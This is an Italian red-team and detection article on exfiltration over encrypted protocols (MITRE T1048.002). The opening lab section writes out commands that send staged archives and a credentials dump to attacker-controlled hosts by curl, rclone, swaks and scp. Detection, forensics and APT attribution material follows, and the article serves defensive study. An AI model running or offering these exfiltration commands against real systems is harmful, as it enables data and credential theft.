Esfiltrazione via Canale Cifrato Asimmetrico: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002)

L'obiettivo in laboratorio è dimostrare che i dati possono lasciare la rete attraverso un canale cifrato che non è il C2 primario, simulando i pattern documentati nei gruppi APT. Prima di partire: assicurati di avere autorizzazione scritta e un ambiente segmentato.

Scenario 1 — Esfiltrazione HTTPS via OWA staging (pattern APT28/APT29)

Il pattern prevede di depositare un archivio su un server OWA compromesso e recuperarlo dall'esterno con una semplice richiesta HTTPS. In laboratorio puoi simularlo con un web server con TLS e curl. Prepara il pacchetto di dati con una compressione protetta da password, poi caricalo:

zip -e -P "RedTeamLab2024" staged_data.zip /tmp/collected/

curl -k --upload-file staged_data.zip https:///owa/attachment.aspx

Dal lato "attaccante esterno", il retrieval è banale:

curl -k -o exfil.zip https:///owa/attachment.aspx

Il punto da evidenziare nel report è che il traffico appare come una normale sessione HTTPS verso un server di posta legittimo.

Scenario 2 — Esfiltrazione SFTP/HTTPS con Rclone (pattern Rclone)

Rclone (open source) è un tool legittimo di sincronizzazione cloud che gli avversari usano per trasferire grandi volumi verso storage esterni. Configura un remote SFTP e lancia il trasferimento:

rclone copy /tmp/staged_data/ exfil-sftp:/drop/ --transfers 1 --bwlimit 512k

Il flag --bwlimit simula il throttling usato per evitare anomalie volumetriche. Per la variante WebDAV su HTTPS:

rclone copy /tmp/staged_data/ exfil-webdav:/drop/ --no-check-certificate

Scenario 3 — Esfiltrazione SMTPS (pattern CURIUM)

Simula l'invio di dati via SMTP cifrato usando swaks (open source), un tool per il testing SMTP:

swaks --to attacker@lab.ext --from compromised@victim.lab --attach staged_data.zip --server --tls --auth-user test --auth-password test

Scenario 4 — Esfiltrazione SCP (pattern Storm-1811)

Per replicare il furto di credenziali via SCP, basta un comando diretto verso un host controllato:

scp /tmp/creds_dump.db attacker@:/incoming/

In ogni scenario, documenta nel report: il protocollo usato, la porta di destinazione, il volume trasferito e la durata della sessione. Questi sono gli indicatori che il Blue Team dovrà cercare.

La sfida principale con T1048.002 è che il traffico malevolo è cifrato con gli stessi protocolli usati dal traffico legittimo. Non puoi fare deep packet inspection su TLS senza un proxy di terminazione, quindi devi lavorare sui metadati delle connessioni e sulla correlazione temporale con eventi di staging.

Log source fondamentali

La detection richiede visibilità combinata su endpoint e rete. Su Windows, i log essenziali sono Sysmon (EventID 3 per connessioni di rete, EventID 11 per creazione file) e il Security Event Log. Su Linux, auditd con regole sulle syscall connect, openat e sendto è il punto di partenza. Su macOS, la combinazione di osquery e Unified Log fornisce visibilità equivalente. In tutti i casi, i flussi di rete (NSM:Flow) da Zeek (open source) o strumenti equivalenti sono indispensabili per l'analisi volumetrica.

Logica di correlazione temporale

L'alert più efficace non cerca la singola connessione HTTPS sospetta — ne troverebbe migliaia — ma correla due eventi distinti in una finestra temporale ristretta di circa 5 minuti: un evento di accesso/compressione file seguito da una connessione TLS in uscita da un processo non-browser. Su Windows, la regola dovrebbe correlare Sysmon EventID 11 (creazione di un archivio .zip, .7z, .rar) con Sysmon EventID 3 (connessione in uscita sulle porte 443, 22, 465) dallo stesso processo o processo figlio.

Tuning per ridurre i falsi positivi

Tre meccanismi di tuning sono critici per rendere gli alert operativi:

• BinaryAllowlist: costruisci una whitelist dei processi legittimamente autorizzati a generare traffico TLS in uscita (browser, agenti di backup, client di posta). Tutto ciò che esce dalla lista e genera sessioni TLS merita un'indagine — in particolare powershell.exe, python.exe, curl.exe o binari custom.
• CertificateIssuerDenylist: se hai visibilità sui metadati TLS (JA3/JA3S tramite Zeek o analoghi), mantieni una lista di CA non fidate o self-signed. Connessioni con certificati emessi da Let's Encrypt verso IP residenziali sono un segnale forte.
• ConnectionDestinationScope: concentra la detection sulle connessioni verso destinazioni non appartenenti ai range aziendali noti, escludendo i servizi cloud autorizzati.

Per ambienti ESXi, monitora i log hostd e vmkernel per connessioni TLS originate da componenti di gestione o da VM che normalmente non generano traffico cifrato in uscita. Mantieni una watchlist delle rotte di uscita attese per ciascuna VM critica.

Un aspetto spesso trascurato: le soluzioni DLP di rete possono ispezionare il traffico HTTPS se posizionate dopo il proxy di terminazione TLS, rilevando pattern di dati sensibili (numeri di carte, codici fiscali, strutture di database) prima che lascino il perimetro.

L'analisi forense di un'esfiltrazione via canale cifrato asimmetrico si concentra su due momenti distinti: la fase di staging dei dati — dove gli artefatti sono abbondanti — e il trasferimento vero e proprio, dove la cifratura limita la visibilità al livello dei metadati.

Artefatti Windows

Parti dalla ricostruzione della catena di staging. I file prefetch (C:\Windows\Prefetch) di tool come rclone.exe, curl.exe, scp.exe o di archiver come 7z.exe documentano l'esecuzione con timestamp precisi. Incrocia questi dati con il journal NTFS ($MFT, $UsnJrnl) per identificare la creazione di archivi temporanei nella directory di staging — spesso %TEMP%, %APPDATA% o sottocartelle della webroot di IIS/OWA.

I log Sysmon sono la spina dorsale della timeline. EventID 1 (Process Create) cattura la command line completa — cerca parametri come --upload-file, rclone copy, scp con percorsi verso file sospetti. EventID 3 (Network Connection) ti dà IP di destinazione, porta e processo sorgente. Correla i due: se rclone.exe viene creato alle 02:14:33 e una connessione HTTPS verso un IP esterno parte alle 02:14:47, hai il legame causale.

Per il pattern OWA documentato nella campagna SolarWinds Compromise (C0024), cerca nei log IIS le richieste PUT o POST anomale verso path dell'OWA, seguite da richieste GET dalla stessa risorsa ma da IP esterni. L'archivio protetto da password depositato sul server è un artefatto chiave — anche se cancellato, la voce $MFT ne conserva nome e dimensione.

Artefatti Linux

Su sistemi Linux, i log di auditd registrano le syscall connect e openat associate al trasferimento. Cerca le tracce di curl, wget, python o scp nei log audit filtrando per la syscall connect verso porte 443, 22 o 465. La bash history (o equivalente per altre shell) potrebbe contenere comandi di compressione seguiti da trasferimenti, anche se attaccanti sofisticati la disabilitano.

Il file system fornisce indizi complementari: controlla i timestamp di accesso (atime) su directory contenenti dati sensibili — accessi massivi in sequenza rapida suggeriscono un'operazione di raccolta automatizzata che precede l'esfiltrazione.

Artefatti macOS e rete

Su macOS, i log unificati (Unified Log) catturano le connessioni TLS con dettagli sul processo originante. Filtra per il subsystem com.apple.network e cerca processi non-browser che stabiliscono sessioni TLS.

A livello di rete, i log di flusso (NetFlow/Zeek) sono fondamentali per quantificare l'esfiltrazione. Cerca sessioni TLS con volumi di upload anomali — il pattern tipico è una singola sessione con trasferimento asimmetrico dove i byte inviati superano significativamente quelli ricevuti. I metadati JA3 possono rivelare client TLS non standard, compatibili con tool di esfiltrazione piuttosto che con browser legittimi.

L'esfiltrazione su canale cifrato non-C2 è una tecnica trasversale a gruppi con capacità, obiettivi e geografia molto diversi. Questo ne conferma la versatilità operativa: funziona tanto per il gruppo nation-state con mesi di persistenza quanto per l'operatore più tattico con obiettivi immediati.

APT28 (G0007), attribuito al GRU russo, utilizza HTTPS per estrarre archivi precedentemente depositati su server OWA compromessi delle vittime. Questo approccio è particolarmente insidioso: il server di esfiltrazione è l'infrastruttura stessa della vittima, quindi il traffico HTTPS in uscita punta a un dominio interno legittimo. Il pattern di staging su OWA è coerente con le capacità di accesso alle infrastrutture email che questo gruppo dimostra costantemente nelle proprie operazioni.

CURIUM (G1012) sceglie invece il protocollo SMTPS per portare fuori i dati raccolti. L'uso della posta cifrata come vettore di esfiltrazione è una scelta che sfrutta il fatto che molte organizzazioni consentono traffico SMTP in uscita con meno scrutinio rispetto ad HTTPS, specialmente se i mail server interni sono autorizzati a comunicare con relay esterni. Il profilo di questo gruppo suggerisce operazioni mirate dove il volume di dati esfiltrati è contenuto e compatibile con allegati email.

Storm-1811 (G1046) adotta SCP per trasferire credenziali utente catturate. L'uso di Secure Copy Protocol indica un'operazione più diretta, orientata al furto di credenziali piuttosto che all'esfiltrazione massiva di documenti. SCP su porta 22 è un protocollo che molti ambienti aziendali filtrano meno aggressivamente di quanto dovrebbero, soprattutto quando i team di sviluppo lo utilizzano quotidianamente.

La campagna SolarWinds Compromise (C0024), condotta tra agosto 2019 e gennaio 2021, rappresenta il caso d'uso più sofisticato. APT29 ha esfiltrato dati tramite richieste HTTPS verso archivi protetti da password depositati sui server OWA delle vittime — un pattern quasi identico a quello di APT28, il che suggerisce una convergenza operativa tra gruppi russi distinti sull'uso dell'infrastruttura della vittima come punto di transito.

Sul fronte dei tool, IcedID (S0483) — un malware bancario evoluto in loader generico — usa HTTPS nativo per l'esfiltrazione, confermando che anche l'ecosistema crimeware adotta questa tecnica. Rclone (S1040), tool legittimo di sincronizzazione, viene abusato per trasferimenti via SFTP e HTTPS/WebDAV, rappresentando il classico caso di living-off-the-land con software dual-use.

Il trend da monitorare è la crescente sovrapposizione tra protocolli di esfiltrazione e traffico aziendale ordinario. Il passaggio progressivo verso ambienti cloud rende HTTPS il canale universale, e distinguere un upload su SharePoint legittimo da un'esfiltrazione via WebDAV verso storage controllato dall'attaccante richiede contesto — non solo firme di rete.

Framework MITRE ATT&CK — T1048.002, TA0010, G0007, G1012, G1046, S0483, S1040, C0024, M1031, M1030, M1037, M1057. Tool di detection: Sysmon, auditd, Zeek, osquery. Integrato con conoscenza professionale per tool e procedure operative.